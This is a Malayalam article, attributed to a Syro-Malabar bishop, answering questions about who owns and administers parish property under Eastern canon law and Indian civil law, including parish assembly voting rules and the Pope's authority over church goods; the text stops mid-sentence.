സഭാസ്വത്ത്: ചോദ്യങ്ങളും അവക്കുള്ള ഉത്തരങ്ങളും

ബിഷപ്പ് ജോസ് പൊരുന്നേടം മാനന്തവാടി രൂപതയുടെ മെത്രാന്‍

1. പള്ളിയുടെ സ്വത്ത് എന്ത്?

ചോദ്യങ്ങള്‍ക്ക് ഉത്തരം പറയുന്നതിന് മുമ്പായി ചില കാര്യങ്ങള്‍ വ്യക്തമാക്കട്ടെ. ചോദ്യങ്ങളുടെ പ്രകൃതി കണ്ടിട്ട് അവ സീറോ മലബാര്‍ സഭയിലെ ഇടവകകളുടെയും സ്ഥാപനങ്ങളുടെയും പശ്ചാത്തലത്തിലാണെന്ന് തോന്നുന്നു. അതുകൊണ്ട് പൌരസ്ത്യ കാനന്‍ നിയമത്തെയും സീറോ മലബാര്‍ സഭയുടെ പ്രത്യേകനിയമങ്ങളെയും മറ്റും അടിസ്ഥാനപ്പെടുത്തിയാണ് ഈ ഉത്തരങ്ങള്‍. ലത്തീന്‍ സഭയിലും സീറോ മലങ്കര കത്തോലിക്കാ സഭയിലും നിയമങ്ങള്‍ ഇതുപോലെ തന്നെയാകണമെന്നില്ല.

കത്തോലിക്കാ സഭയിലെ ഒരു നയ്യാമികവ്യക്തിയുടെ പേരിലുള്ള എല്ലാ വസ്തുവകകളും സഭാസ്വത്താണ് എന്നാണ് പൌരസ്ത്യ സഭകള്‍ക്കായുള്ള കാനന്‍നിയമസംഹിത നിര്‍വ്വചിക്കുന്നത്(All temporal goods which belong to juridical persons are ecclesiastical goods (CCEO, c. 1009 #2).ഇടവക ഒരു നയ്യാമിക വ്യക്തിയാണ്. അതുകൊണ്ട് ഇടവകയുടെ സ്വത്തും സഭാസ്വത്താണ്. സഭാസ്വത്തുക്കളുടെ ഭരണത്തെപ്പറ്റിയാണ് സഭാനിയമം പ്രതിപാദിക്കുന്നത്. സീറോ മലബാര്‍ സഭയുടെ പ്രത്യേകനിയമങ്ങളിലും ഓരോ രൂപതയുടേയും നിയമാവലിയിലും ഇടവകയുടെ സ്വത്തിന്‍റെ ഭരണത്തെപ്പറ്റി കൂടുതല്‍ നിര്‍ദ്ദേശങ്ങള്‍ ഉണ്ട്.

യഥാര്‍ത്ഥത്തില്‍ പള്ളിയുടെ സ്വത്ത് എന്നല്ല ഇടവകയുടെ അല്ലെങ്കില്‍ സ്ഥാപനത്തിന്‍റെ അല്ലെങ്കില്‍ സംഘടനയുടെ സ്വത്ത് എന്നെല്ലാമാണ് പറയേണ്ടത്. കാരണം പള്ളിയെന്ന വാക്കുകൊണ്ട് വിവക്ഷിക്കുന്നത് പള്ളിയെന്ന കെട്ടിടം മാത്രമാണ്. ഇടവകയുടെ പേരിലുള്ള സ്ഥലങ്ങള്‍, പള്ളിക്കെട്ടിടം, മറ്റ് കെട്ടിടങ്ങള്‍, സ്ഥാപനങ്ങള്‍, ബാങ്ക് ഡിപ്പോസിറ്റ്, കടപ്പത്രങ്ങള്‍, സ്വര്ണ്ണം പോലെയുള്ള വസ്തുക്കള്‍, പള്ളിയിലുള്ള കുരിശുകള്‍, കുടകള്‍, തിരുസ്വരൂപങ്ങള്‍, തിരുവസ്ത്രങ്ങള്‍, തിരുപ്പാത്രങ്ങള്‍, ഫര്‍ണിച്ചര്‍, ഗ്യാസ് കണക്ഷന്‍, യന്ത്രങ്ങള്‍, തുടങ്ങിയവയെല്ലാം ഉള്‍പ്പെടുന്നതാണ് ഇടവകയുടെ സ്വത്തുക്കള്‍.

2. പള്ളിയുടെ സ്വത്ത് ഉണ്ടാകുന്നത് എങ്ങനെയാണ്?

ഇടവകകളുടെ സ്വത്തുക്കള്‍ ഉണ്ടാകുന്നത് പല സ്രോതസ്സുകളില്‍ നിന്നായിട്ടാണ്. എല്ലാ സ്ഥലത്തും സ്വത്തുണ്ടാകുന്നത് ഒരുപോലെയുമല്ല. പുരാതന ഇടവകള്‍ക്ക് സ്ഥലം കിട്ടിയിട്ടുള്ളത് കത്തോലിക്കരും അകത്തോലിക്കരും ആയ വ്യക്തികളില്‍ നിന്നും രാജാക്കന്മാരില്‍ നിന്നും പ്രഭുക്കന്മാരില്‍ നിന്നും മറ്റുമാണ്. കുറെ സ്ഥലങ്ങള്‍ ജനങ്ങളുടെ സംഭാവനകള്‍ ഉപയോഗിച്ച് വാങ്ങിയതും ഉണ്ടാകും. അതില്‍ നിന്ന് ലഭിച്ച വരുമാ‍നവും ആ വരുമാനം ഉപയോഗിച്ച് നിര്‍മ്മിച്ച കെട്ടിടങ്ങളില്‍ നിന്നും കൃഷിയില്‍ നിന്നും കിട്ടുന്ന വരുമാനവും വിശ്വാസികളുടെ കാലാകാലങ്ങളിലുള്ള സംഭാവനകളും എല്ലാം ചേര്‍ന്നാണ് ഇന്നുള്ളതുപോലെയുള്ള സ്വത്തുക്കള്‍ ഉണ്ടായിട്ടുള്ളത്.

എന്നാല്‍ അടുത്തകാലത്ത് ഉണ്ടായിട്ടുള്ള രൂപതകള്‍ക്കും ഇടവകകള്‍ക്കും സ്ഥാപനങ്ങള്‍ക്കും മറ്റും ഭാഗികമായി വിദേശത്തുള്ള കത്തോലിക്കരുടെ സംഭാവന കിട്ടിയിട്ടുണ്ടാകാം. പല പള്ളികളും സ്ഥാപനങ്ങളും മറ്റും അങ്ങനെ നിര്‍മ്മിച്ചിട്ടുണ്ട്. എന്നാല്‍ വരുമാനവര്‍ദ്ധനവിന് ഉതകുന്ന തരത്തിലുള്ള സംഭാവനകള്‍ വിദേശത്ത് നിന്ന് കിട്ടുന്നത് വിരളമാണ്. സന്ന്യസ്തസമൂഹങ്ങള്‍ സഥലവും പണവും മറ്റും ഇടവകകള്‍ക്ക് കൊടുക്കുന്ന പതിവും ഉണ്ട്. നിര്‍മ്മാണ പ്രവര്‍ത്തനങ്ങള്‍ ഉണ്ടാകുമ്പോള്‍ ഇത് കൂടുതലായി സംഭവിക്കുന്നുണ്ട്.

കാലാകാലങ്ങളില്‍ അതാത് ഇടവകകളിലെ അംഗങ്ങള്‍ കൊടുക്കുന്ന തുകകളും മറ്റ് ഇടവകകളില്‍ നിന്ന് വര്‍ഷാവര്‍ഷം രൂപതാകേന്ദ്രങ്ങളില്‍ കിട്ടുന്ന വിഹിതത്തില്‍ നിന്ന് വീതിച്ച് കൊടുക്കുന്ന തുകകളും കൊണ്ട് പല ഇടവകകളിലും പള്ളികളിലും പള്ളിമുറികളും പണികയും സ്ഥലങ്ങള്‍ വാങ്ങുകയും മറ്റും ചെയ്തിട്ടുണ്ട്. ചില രൂപതകളില്‍ വൈദികരും ഇടവകപ്രതിനിധികളും അതേ രൂപതയിലെയോ മറ്റ് രൂപതകളിലേയൊ ഇടവകളില്‍ പോയി സമാഹരിക്കുന്ന തുകകള്‍ കൊണ്ടും ഇപ്രകാരം ചെയ്യാറുണ്ട്. ഇതെല്ലാം ഓരോ രൂപതയിലും വ്യത്യസ്തമായതുകൊണ്ട് എല്ലാ ഇടവകകള്‍ക്കും യോജിക്കുന്ന ഒരു ഉത്തരം നല്കുക വിഷമമാണ്.
ഇടവകയുടെ സ്വത്ത് വര്‍ദ്ധിക്കുന്നതില്‍ ഇടവകയുടെ ഉത്തരവാദിത്വമുള്ള വൈദികരുടേയും രൂപതകളുടെ ഉത്തരവാദിത്വമുള്ള മെത്രാന്മാരുടേയും ഇടവകകളില്‍ ശുശ്രൂഷ ചെയ്യുന്ന സന്യസ്തരുടേയും ഇടവകയിലെ കൈക്കാരന്മാരുടേയും മറ്റ് ഭരണസമിതികളുടേയും ഭാഗഭാഗിത്വം വളരെ പ്രധാനമാണ്. സ്വത്തുക്കള്‍ സംരക്ഷിക്കുന്നതിലും അവയെ വര്‍ദ്ധിപ്പിക്കുന്നതിലും. അവരുടെ നേതൃത്വമില്ലായിരുന്നങ്കില്‍ തീര്ച്ചകയായും ചിത്രം മറ്റൊന്നാകുമായിരുന്നു. ഇപ്രകാരം നേതൃത്വം വഹിക്കുന്നവര്‍ക്ക് കിട്ടുന്ന പ്രതിഫലം അവരുടെ വിദ്യാഭ്യാസയോഗ്യതക്കും കഴിവിനും അനുസൃതമായി മറ്റ് തലങ്ങളില്‍ കിട്ടാമായിരുന്ന തുകയിലും വളരെ കുറവാണ് എന്നും ഓര്‍ത്തിരിക്കേണ്ടതുണ്ട്. വൈദികന്‍ സ്ഥിരമായി ഇടവകയില്‍ ഇല്ലാതെ വന്നാല്‍ എന്ത് സംഭവിക്കും എന്ന് അനുഭവം നമ്മെ പഠിപ്പിക്കുന്നുണ്ട്. പൊതുയോഗം ഒരു പള്ളി പണിയാന്‍ തീരുമാനിച്ചാലും ഒരു വൈദികന്‍റെ നേതൃത്വമുള്ളതുകൊണ്ടാണ് അത് പലപ്പോഴും ഇന്നത്തേതുപോലെ വിജയകരമാകുന്നത്. പ്രത്യേകിച്ചും അവിവാഹിതരായ വൈദികര്‍ ഉള്ളതുകൊണ്ടാണ് അത് സാദ്ധ്യമാകുന്നത്. വിവാഹിതരാണെങ്കില്‍ അവരുടെ സമയത്തിന്റെ ഭൂരിഭാഗവും തങ്ങളുടെ കുടുംബങ്ങളുടെ ആവശ്യങ്ങള്‍ക്ക് വിനിയോഗിക്കേണ്ടി വരും. വിവാഹിതരായ വൈദികര്‍ ഉള്ള കത്തോലിക്കാ സഭകളിലേയും അകത്തോലിക്കാ സഭകളിലേയും സ്ഥിതി പരിശോധിച്ചാല്‍ ഈ വസ്തുത വ്യക്തമാകും.

3. സിവില്‍ നിയമം അനുസരിച്ച് പള്ളിസ്വത്ത് ആരുടെ പേരിലാണ്?

സിവില്‍ നിയമം അനുസരിച്ച് ഇടവകയുടെ സ്വത്തുക്കള്‍ എല്ലാം ഇടവകയെന്ന നയ്യാമികവ്യക്തിയുടെ (Juridic Person)പേരിലായിരിക്കും. ഇടവകക്ക് ഒരു സ്കൂളോ മറ്റ് സ്ഥാപനങ്ങളോ ഉണ്ടെങ്കില്‍ നിയമപൂര്‍ത്തീകരണത്തിനായി കുറെ സ്വത്തുക്കള്‍ ആ സ്ഥാപനനങ്ങളുടെ പേരിലും ഉണ്ടാകാം. കാരണം അവയും നയ്യാമിക വ്യക്തികള്‍ തന്നെ. അവയും അവയുടെ സ്വത്തുക്കളും സിവില്‍ നിയമങ്ങള്‍ക്ക് വിധേയമായി ഇടവകയുടേത് തന്നെയാണ്.എന്നാല്‍ പല രൂപതകളിലും ഉള്ള സ്കൂള്‍ കോര്‍പ്പറേറ്റ് മാനേജ്മെന്‍റിന്‍റെ കിഴിലുള്ള സ്കൂളുകളാണെങ്കില്‍ ഇടവകയിലാണെങ്കിലും അവ രൂപതയെന്ന നയ്യാമിക വ്യക്തിയുടെ സ്വത്തായിട്ടാണ് കരുതപ്പെടുക. പക്ഷേ സ്കൂള്‍ പോലെയുള്ള സ്ഥാപനങ്ങള്‍ സര്‍ക്കാര്‍ നിയമത്തിന് വിധേയമായി മാത്രമേ അവയുടെ സ്വത്തുക്കള്‍ കൈകാര്യം ചെയ്യാന്‍ പാടുള്ളു. അവയുടെ ഉടമസ്ഥരായ ഇടവകകള്‍ക്കോ രൂപതക്കോ ഇഷ്ടം പോലെ കൈകാര്യം ചെയ്യാന്‍ അനുവാദമില്ല. ഇടവകകളുടെ സ്ഥിതിയും വ്യത്യസ്തമല്ല.

4. ഇടവകസ്വത്തിന്‍റെ യഥാര്‍ത്ഥ അധികാരി ആരാണ്?

നിയമദൃഷ്ടിയില്‍ ഇടവക ഒരു നയ്യാമിക വ്യക്തിയാണ് എന്ന് പറഞ്ഞല്ലൊ. ആ നയ്യാമിക വ്യക്തിയാണ് ഇടവകയുടെ സ്വത്തിന്‍റെ യഥാര്‍ത്ഥ അധികാരി. സ്ഥാപനങ്ങളും സംഘടനകളും എല്ലാം നിയമദൃഷ്ടിയില്‍ അവകാശങ്ങളും ഉത്തരവാദിത്വങ്ങളും ഉള്ള നയ്യാമികവ്യക്തികളാണ്. അതുകൊണ്ടാണ് അവക്ക് സ്വത്തുക്കള്‍ സമ്പാദിക്കാനും അവയുടെ ഉടമസ്ഥാവകാശം ഉണ്ടായിരിക്കാനും അവ വില്‍ക്കാനും മറ്റും സാധിക്കുന്നത്. അതുകൊണ്ട് തന്നെയാണ് അവയ്ക്കെതിരെ കേസു കൊടുക്കാനും കഴിയുന്നത്. ഇക്കാര്യങ്ങളെല്ലാം നിയന്ത്രിക്കപ്പെടുന്നത് അവയുടെ തന്നെയും സഭയുടെയും സര്‍ക്കാരിന്‍റെയും നിയമങ്ങള്‍ക്ക് വിധേയമായിട്ടാണ്.

അധികാരി നയ്യാമിക വ്യക്തിയാണെങ്കിലും നിയമത്തില്‍ നിര്‍വ്വചിച്ചിട്ടുള്ള വ്യക്തിയായിരിക്കും അവയെ പ്രതിനിധാനം ചെയ്ത് കാര്യങ്ങള്‍ നിര്‍വ്വഹിക്കുന്നത്. ഉദാഹരണത്തിന് ഇടവകയെ പ്രതിനിധീകരിക്കുന്നത് വികാരിയാണ്. സ്കൂളാണെങ്കില്‍ കാര്യത്തിന്‍റെ പ്രകൃതിയനുസരിച്ച് പ്രധാനാദ്ധ്യാപകനോ മാനേജരോ പ്രതിനിധാനം ചെയ്യും. അവര്‍ സ്വത്തിന്‍റെ ഉടമകളല്ലെങ്കിലും അവരുടെ വാക്കുകളാണ് അവര്‍ പ്രതിനിധാനം ചെയ്യുന്ന നയ്യാമിക വ്യക്തിയുടെ അഭിപ്രായമായി കണക്കാക്കുന്നത്.

ഇടവകയെയും മറ്റ് സ്ഥാപനങ്ങളേയും സംഘടനകളേയും മറ്റുമാണ് ഒരു നയ്യാമിക വ്യക്തിയായി ഇന്ത്യന്‍ നിയമം അംഗീകരിക്കുന്നത്. അങ്ങനെ അംഗീകരിക്കപ്പെടുമ്പോള്‍ ഇന്ത്യന്‍ നിയമത്തില്‍ നിര്‍വ്വചിച്ചിട്ടുള്ള ഏതെങ്കിലും ഒരു നയ്യാമിക രൂപമാണ് അവക്ക് കിട്ടുന്നത്. ഇടവക എന്നൊരു രൂപം ഇന്ത്യന്‍ നിയമത്തിലില്ല. അതുകൊണ്ട് ഇടവകകള്‍ സാധാരണയായി സൊസൈറ്റി, ട്രസ്റ്റ് തുടങ്ങിയ നയ്യാമിക രൂപങ്ങളാണ് സ്വീകരിക്കുന്നത്. അവയുടെ പ്രവര്‍ത്തനത്തിന് അനുവദിക്കപ്പെട്ടിരിക്കുന്ന മാനദണ്ഡങ്ങള്‍ ഇടവകകളുടെ പ്രവര്‍ത്തനത്തിന് അനുയോജ്യമായതിനാലാണ് അങ്ങനെയുള്ള രൂപം എടുക്കുന്നത്. ഇടവക രൂപതയുടെ ഭാഗമായതിനാലും കാനന്‍ നിയമമനുസരിച്ച് രൂപതാമെത്രാന് ഇടവകയുടെ മേല്‍ മേല്‍നോട്ടാധികാരം ഉള്ളതിനാലും ഇടവകയുടെ മേല്‍ രൂപതാമെത്രാനുള്ള മേല്‍നോട്ടാധിഅകാരം സിവില്‍ നിയമവും അംഗീകരിക്കുന്നു. ആ അകവാകാശം ഉടമസ്ഥാവകാശമല്ല എന്നത് പ്രത്യേകം പ്രസ്താവ്യമാണ്.
കേരളത്തെ സംബന്ധിച്ച് പ്രത്യേകം ശ്രദ്ധിക്കേണ്ട കാര്യം ഇവിടുത്തെ മിക്ക ഇടവകകളും നിയമത്തിന്‍റെ അടിസ്ഥാനത്തില്‍ ഔദ്യോഗികമായി രജിസ്റ്റര്‍ ചെയ്യപ്പെട്ടവയല്ല എന്നതാണ്. ക്രിസ്തുമതവും ഇടവകകളും അവയുടെ സ്ഥാപനങ്ങളും എല്ലാം ഇന്ത്യക്ക് സ്വാതന്ത്ര്യം കിട്ടുന്നതിന് മുമ്പ് തന്നെ ഇവിടെ ഉണ്ടായിരുന്നതുകൊണ്ട് സര്‍ക്കാരുകളും കോടതികളും മറ്റ് നിയമസംവിധാനങ്ങളും എല്ലാം അവയെ അങ്ങനെ അംഗീകരിക്കുകയാണുണ്ടായത്. എങ്കിലും ഇടക്കിടെ അക്കാര്യങ്ങള്‍ കോടതികളില്‍ ചോദ്യം ചെയ്യപ്പെടാറുണ്ട്.

5. ആര്‍ക്കാണ് ഇടവകസ്വത്ത് കൈകാര്യം ചെയ്യാന്‍ അധികാരം?

നിയമത്തില്‍ മറ്റെന്തെങ്കിലും രീതി നിശ്ചയിച്ചിട്ടില്ലെങ്കില്‍ ഒരു നയ്യാമിക വ്യക്തിയുടെ സ്വത്ത് കൈകാര്യം ചെയ്യുക എന്ന ഉത്തരവാദിത്വം ആ സ്വത്തുക്കളുടെ സാധാരണ ഭരണം ആരുടെ കയ്യിലാണോ അദ്ദേഹത്തിന്‍റേതാണ് എന്നാണ് പൌരസ്ത്യസഭകള്‍ക്കുള്ള കാനന്‍ നിയമസംഹിത നിഷ്കര്‍ഷിക്കുന്നത് {Unless the law provides otherwise, the administration of the ecclesiastical goods of a juridic person is the responsibility of the one who immediately governs it (CCEO, c/ 1023)}.

ഇടവകയെന്ന ട്രസ്റ്റിന്‍റെ അഥവാ സൊസൈറ്റിയുടെ ജനറല്‍ ബോഡി യോഗമായ പള്ളിയോഗത്തിന്‍റെ അല്ലെങ്കില്‍ തത്തുല്യ സമിതിയായ പ്രതിനിധിയോഗത്തിന്‍റെ സമ്മതത്തോടെ ഇടവകവികാരിക്കും ഇടവകയിലെ കൈക്കാരന്മാര്‍ക്കും ഒന്നിച്ചൊ അല്ലെങ്കില്‍ വെവ്വേറെയോ ഇടവകയുടെ സ്വത്തുക്കള്‍ കൈകാര്യം ചെയ്യാന്‍ അധികാരമുണ്ട്. അക്കാര്യങ്ങള്‍ നിയന്ത്രിക്കുന്നത് സഭയുടെ പൊതുനിയമങ്ങളും ഇന്ത്യയുടെ സിവില്‍ നിയമങ്ങളും അതാത് രൂപതകളുടെ നിയമങ്ങളും നിയമാവലി ഉള്ള സ്ഥാപനങ്ങളാണെങ്കില്‍ അവയും മറ്റുമാണ്. ഇടവകവികാരിയുടെയും കൈക്കാരന്മാരുടേയും ഇക്കാര്യത്തിലുള്ള അധികാരം നിയന്ത്രിക്കുന്നത് കാനന്‍ നിയമവും പള്ളിയോഗത്തിന്‍റെ നിയമാവലിയും ഓരോ രൂപതയുടേയും നിയമാവലിയും ആണ്. സമിതികളുടെ സമ്മതം നിശ്ചയിക്കുന്നത് ഭൂരിപക്ഷാഭിപ്രായപ്രകാരമാണ്. സാധാരണഗതിയില്‍ വോട്ടെടുപ്പൊന്നും ഈ സമിതികളില്‍ ഉണ്ടാകാറില്ല. വേണമെങ്കില്‍ വോട്ടെടുപ്പ് നടത്തി ഭൂരിപക്ഷാഭിപ്രായം തേടുകയും ചെയ്യാം.

പള്ളിയോഗത്തെ സംബന്ധിച്ച് ശ്രദ്ധേയമായ കാര്യം അതിന്‍റെ സമ്മേളനങ്ങള്‍ക്ക് ക്വോറം ഇല്ല എന്നതാണ്. അതുകൊണ്ട് അതില്‍ പങ്കെടുക്കുന്ന ഭൂരിപക്ഷം പേരുടെ അഭിപ്രായം പൊതുയോഗത്തിന്‍റെ സമ്മതമായി കണക്കാക്കും. അത് ഇടവകയിലെ എല്ലാ അംഗങ്ങള്‍ക്കും ബാധകമാകുകയു ചെയ്യും. കുടുംബനാഥന്മാരോ അവരുടെ അഭാവത്തില്‍ കുടുംബനാഥമാരോ അല്ലെങ്കില്‍ സ്ഥിരമായ രീതിയില്‍ ഏര്‍പ്പെടുത്തിയിട്ടുള്ള പ്രായപൂര്‍ത്തിയായ ഒരു കുടുംബാംഗമോ ആയിരിക്കുംപള്ളിയോഗത്തിന്‍റെ അംഗങ്ങള്‍. ഉദാഹരണമായി നൂറ് കുടുംബങ്ങള്‍ ഉള്ള ഒരിടവകയിലെ പള്ളിയോഗത്തില്‍ നൂറ് അംഗങ്ങള്‍ ഉണ്ടായിരിക്കും. അതില്‍ ഇരുപത് പേര്‍ പങ്കെടുക്കുന്ന ഒരു പൊതുയോഗത്തില്‍ പതിനൊന്ന് പേര്‍ ചേര്‍ന്ന് ഒരു തീരുമാനം എടുത്താല്‍ നിയമദൃഷ്ട്യാ അത് സാധുവാണ്. നിയമത്തില്‍ മറ്റൊന്നും മറിച്ച് പറയുന്നില്ലെങ്കില്‍ ഖണ്ഡിതഭൂരിപക്ഷമുണ്ടെങ്കില്‍ തീരുമാനങ്ങള്‍ സാധുവാകും. യോഗത്തില്‍ പങ്കെടുക്കുന്നവരുടെ പകുതിയില്‍ കൂടുതല്‍ പേര്‍ ഒരു തീരുമാനത്തിന് സമ്മതം കൊടുക്കുമ്പോള്‍ ഖണ്ഡിതഭൂരിപക്ഷം ഉണ്ട് എന്ന് പറയുന്നു.

പള്ളിയോഗമോ അല്ലെങ്കില്‍ പ്രതിനിധിയോഗമോ എടുക്കുന്ന തീരുമാനങ്ങള്‍ നിലവിലുള്ള സഭാനിയമങ്ങള്‍ അനുസരിച്ച് രൂപതാദ്ധ്യക്ഷന്‍റെ അംഗീകാരത്തിന് വിധേയമാണ്. അംഗീകാരം കിട്ടിയാലേ ആ തീരുമാനങ്ങള്‍ നടപ്പിലാക്കാന്‍ പറ്റുകയുള്ളു. അത് സിവില്‍ നിയമവും അംഗീകരിക്കുന്നു. അംഗീകാരം കൊടുക്കുന്നതിന് മുമ്പായി പൊതുയോഗത്തില്‍ പങ്കെടുത്തവരുടെ ലിസ്റ്റ് ചോദിക്കാറുണ്ട്. യോഗപുസ്തകത്തില്‍ ഒപ്പിട്ടിരിക്കുന്നവരുടെ ലിസ്റ്റാണ് ചോദിക്കുന്നത്. അംഗീകാരത്തിനായി സമര്‍പ്പിക്കുന്ന തീരുമാനങ്ങള്‍ നിയമാനുസൃതം എടുത്തതാണ് എന്നുറപ്പിക്കുന്നതിനാണ് അപ്രകാരം ചെയ്യുന്നത്. അതുപോലെ തന്നെ അംഗീകാരത്തിനായി സമര്‍പ്പിക്കുന്ന തീരുമാനങ്ങള്‍ എടുത്ത പൊതുയോഗസമ്മേളനം നിയമാനുസൃതം വിളിച്ചു ചേര്‍ത്തവയാണെന്നും പങ്കെടുത്തവര്‍ അതിന് അവകാശമുള്ളവര്‍ മാത്രമാണെന്നും ഉറപ്പു വരുത്തിയ ശേഷമാണ് അംഗീകാരം കൊടുക്കുന്നത്.

സാധാരണഗതിയില്‍ നിയമാനുസൃതം എടുത്ത തീരുമാനങ്ങളെ ഏകപക്ഷീയമായി അംഗീകരിക്കാതിരിക്കാന്‍ രൂപതാദ്ധ്യക്ഷന് സാദ്ധ്യമല്ല. അതേ സമയം തീരെ കുറച്ച് അംഗങ്ങളുടെ പങ്കാളിത്വത്തോടെ എടുക്കപ്പെടുന്ന പ്രധാനപ്പെട്ട തീരുമാനങ്ങളെ അംഗീകരിക്കാന്‍ പ്രയാസം നേരിടും. അതുപോലെ തന്നെ നിയമാനുസൃതമല്ലാതെ എടുക്കുന്ന തീരുമാനങ്ങളും അംഗീകരിക്കപ്പെടാതെ പോകാം. ഈ സാഹചര്യം ഒഴിവാകണമെങ്കില്‍ പൊതുയോഗത്തില്‍ അല്ലെങ്കില്‍ പ്രതിനിധിയോഗത്തില്‍ പങ്കെടുക്കാന്‍ അവകാശമുള്ള എല്ലാവരും പങ്കെടുക്കുകയും അവരുടെ അഭിപ്രായം രേഖപ്പെടുത്തുകയും ചെയ്യണം. യോഗം നിയമാനുസൃതമാനെങ്കിലേ അവര്‍ അങ്ങനെ ചെയ്യാവൂ.

പങ്കെടുക്കേണ്ടവര്‍ യോഗത്തില്‍ പങ്കെടുക്കാതെ പിന്നീട് പരാതികള്‍ ഉന്നയിക്കുന്നതില്‍ അര്‍ത്ഥമില്ല. എങ്കിലും ന്യായമായ പരാതികള്‍ ഉണ്ടെങ്കില്‍ അക്കാര്യം ആദ്യം പൊതുയോഗത്തിന് തന്നെ സമര്‍പ്പിക്കുകയും അവരുടെ തീരുമാനത്തില്‍ തൃപ്തി വരുന്നില്ലെങ്കില്‍ മാത്രം രൂപതാദ്ധ്യക്ഷനെ സമീപിക്കുകയും ചെയ്യാം. അത്തരം കാര്യങ്ങള്‍ പരിശോധിച്ച് തീരുമാനമെടുക്കുന്നത് രൂപതാദ്ധ്യക്ഷന്‍ നിയമിക്കുന്ന അഡ്മിനിസ്റ്റ്രേറ്റീവ് ട്രൈബൂണലാണ്. ഇക്കാര്യങ്ങളെല്ലാം കാനന്‍ നിയമസംഹിതയിലും പൌരസ്ത്യവ്യക്തിഗതസഭകളുടെ പ്രത്യേക നിയമങ്ങളിലും രൂപതകളുടെ നിയമാവലികളിലും കൊടുത്തിരിക്കുന്നത് എല്ലാവരും പ്രത്യേകിച്ച് അല്മായവിശ്വാസികളും പഠിച്ചിരിക്കേണ്ടത് സഭാഭരണം സുഗമമാക്കാന്‍ അത്യന്താപേക്ഷിതമാണ്. അതല്ലെങ്കില്‍ ശക്തിയും സ്വാധീനവും മറ്റും ഉള്ളവര്‍ കാര്യങ്ങളെ നിയന്ത്രിച്ചെന്ന് വരും.

6. കത്തോലിക്കാ സഭയുടെ മുഴുവന്‍ സ്വത്തിന്‍റെയും അധികാരം മാര്‍പാപ്പക്കാണോ? അത് എന്ത് മാത്രം ശരിയാണ്?

പൌരസ്ത്യ സഭകള്‍ക്കായുള്ള നിയമസംഹിതയനുസരിച്ച് എല്ലാ സഭാസ്വത്തുക്കളും കൈകാര്യം ചെയ്യുന്നതിന്‍റെയും കാത്തുസൂക്ഷിക്കുന്നതിന്‍റെയും പരമാധികാരം റോമാ മാര്‍പാപ്പയിലാണ്. എന്നാല്‍, അദ്ദേഹത്തിന്‍റെ പരമാധികാരത്തിന്‍ കീഴില്‍ ഭൌതികസ്വത്തുക്കളുടെ ഉടമസ്ഥാവകാശം ആ സ്വത്ത് നിയമാനുസൃതം വാങ്ങിയ നയ്യാമികവ്യക്തിയുടേതാണ് {The Roman Pontiff is the Supreme authority and steward of all ecclesiastical goods. #2 Under the supreme authority of the Roman Pontiff, ownership of temporal goods of the Church belongs to that juridic person which has lawfully acquired them (CCEO, c. 1008)}.

ഈ ചോദ്യംകൊണ്ട് ഉദ്ദേശിക്കുന്നത് എന്താണ് എന്ന് വ്യക്തമാക്കേണ്ടതുണ്ട്. അധികാരി എന്ന വാക്കുകൊണ്ട് ഉദ്ദേശിക്കുന്നത് ഉടമസ്ഥന്‍ എന്നാണെങ്കില്‍ അത് മാര്‍പാപ്പ അല്ല. റോമാ മാര്‍പാപ്പയില്‍ നിക്ഷിപ്തമായിരിക്കുന്നത് സഭാസ്വത്തുക്കള്‍ കൈകാര്യം ചെയ്യുന്നതിന്‍റെയും കാത്തുസൂക്ഷിക്കുന്നതിന്‍റെയും പരമാധികാരം മാത്രമാണ്. പരമാധികാരം എന്ന വാക്കുകൊണ്ട്മനസ്സിലാക്കേണ്ടത് അതിന് താഴെ മറ്റ് അധികാരസഥാനങ്ങള്‍ ഉണ്ടെന്നും അവയുടെ ഉത്തരവാദിത്വം നിര്‍വ്വഹിക്കാതെ വരുമ്പോള്‍ ഇടപെടാന്‍ അധികാരം ഉണ്ടെന്നും പരമാധികാരിയുടെ വാക്ക് അന്തിമം ആയിരിക്കുമെന്നുമാണ്. പരമാധികാരം ഒരിക്കലും അനുദിനഭരണത്തെയൊ ഉടമസ്ഥതയെയൊ സൂചിപ്പിക്കുന്നില്ല. അതുകൊണ്ട് തന്നെ ഒരിടവകയുടെ സ്വത്തുക്കള്‍ ഇഷ്ടം പോലെ വില്ക്കാനോ പണയം വയ്ക്കാനോ ദാനം ചെയ്യാനോ ഒന്നും റോമാ മാര്‍പാപ്പക്ക് അധികാരമില്ല.

സാധാരണയായി ചില കാര്യങ്ങളില്‍ പ്രാദേശികസഭാനേതൃത്വം അപ്പസ്തോലികസിംഹാസനത്തിന്‍റെ അംഗീകാരം വാങ്ങിക്കണം എന്ന് പറയുന്നുണ്ട്. അപ്പസ്തോലികസിംഹാസനം എന്നാല്‍ മാര്‍പാപ്പ എന്ന് അര്‍ത്ഥമില്ല. അപ്പസ്തോലിക സിംഹാസനമാണ് എല്ലാ സഭാസ്വത്തുക്കളുടേയും ഉടമ എന്നും ഇതിനര്‍ത്ഥമില്ല. മാത്രമല്ല കാനന്‍ നിയമത്തിലെ ഈ വകുപ്പ് പ്രാദേശിക സഭാനേതൃത്വത്തിന്‍റെ ഉത്തരവാദിത്വത്തിന്മേലാണ് ചില നിയന്ത്രണങ്ങള്‍ ഏര്‍പ്പെടുത്തിയിരിക്കുന്നത്. സഭാസ്വത്തുക്കള്‍ അന്യായമായി അന്യാധീനപ്പെട്ടു പോകരുത് എന്ന് മാത്രമേ ഈ നിയന്ത്രണം കൊണ്ട് ഉദ്ദേശിക്കുന്നുള്ളു. ഏതെങ്കിലും രാജ്യത്തെ സഭയുടെ സ്വത്തിന്‍റെ ക്രയവിക്രയത്തിലോ ഭരണത്തിലോ കൈകടത്താന്‍ അപ്പസ്തോലിക സിംഹാസനത്തിന് ഈ വകുപ്പ് അധികാരം നല്കുന്നില്ല. സര്‍ക്കാര്‍ ഉദ്യോഗസ്ഥര്‍ക്ക് വിദേശത്ത് പോകാന്‍ സര്‍ക്കാരിന്‍റെ അനുവാദം വേണം എന്ന് പറഞ്ഞാല്‍ പ്രധാനമന്ത്രിയുടെയോ മുഖ്യമന്ത്രിയുടേയോ അനുവാദം വേണമെന്നല്ലല്ലൊ അര്‍ത്ഥം. സര്‍ക്കാര്‍ സ്വത്ത് എന്ന് പറഞ്ഞാല്‍ അവരുടെ സ്വത്ത് എന്ന അര്‍ത്ഥവുമില്ല. അപ്പസ്തോലികസിംഹാസനം എന്ന് പൌരസ്ത്യ കാനന്‍ നിയമത്തിലും പരിശുദ്ധ സിംഹാസനം എന്ന് ലത്തീന്‍ കാനന്‍ 